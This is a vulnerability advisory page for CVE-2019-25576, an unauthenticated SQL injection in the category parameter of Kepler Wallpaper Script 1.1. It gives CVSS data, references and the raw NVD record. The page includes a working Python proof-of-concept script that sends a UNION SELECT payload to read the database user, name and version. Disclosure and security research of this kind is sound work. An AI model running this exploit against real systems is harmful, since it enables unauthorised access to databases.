CVE-2019-25576

Description

Kepler Wallpaper Script 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the category parameter. Attackers can send GET requests to the category endpoint with URL-encoded SQL UNION statements to extract database information including usernames, database names, and MySQL version details.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:keplerwallpapers:kepler_wallpaper_script:1.1:*:*:*:*:*:*:* - VULNERABLE

Kepler Wallpaper Script 1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2019-25576 - Kepler Wallpaper Script SQL Injection
import requests
import sys

def exploit(url):
    # Define the payload targeting the 'category' parameter
    # Using UNION SELECT to extract database version and user
    payload = "1' UNION SELECT 1, user(), database(), version(), 5--+"
    
    # Construct the full request URL
    target = f"{url}/index.php" 
    params = {
        "category": payload
    }
    
    try:
        print(f"[*] Sending request to: {target}")
        response = requests.get(target, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for SQL output.")
            print("[+] Response snippet:")
            print(response.text[:500]) # Print first 500 chars for verification
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print("Example: python {sys.argv[0]} http://127.0.0.1/kepler")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25576
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25576
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25576/
[4] VulDB https://vuldb.com/cve/CVE-2019-25576
[5] https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script
[6] https://keplerwallpapers.online/
[7] https://www.exploit-db.com/exploits/46207
[8] https://www.vulncheck.com/advisories/kepler-wallpaper-script-sql-injection-via-category

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25576", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:01.333", "lastModified": "2026-04-15T17:07:44.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kepler Wallpaper Script 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the category parameter. Attackers can send GET requests to the category endpoint with URL-encoded SQL UNION statements to extract database information including usernames, database names, and MySQL version details."}, {"lang": "es", "value": "Kepler Wallpaper Script 1.1 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso en el parámetro category. Los atacantes pueden enviar solicitudes GET al endpoint category con sentencias SQL UNION codificadas en URL para extraer información de la base de datos, incluyendo nombres de usuario, nombres de bases de datos y detalles de la versión de MySQL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keplerwallpapers:kepler_wallpaper_script:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "43926737-C16D-4F4F-A9D7-EF81412B8740"}]}]}], "references": [{"url": "https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://keplerwallpapers.online/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/46207", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/kepler-wallpaper-script-sql-injection-via-category", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}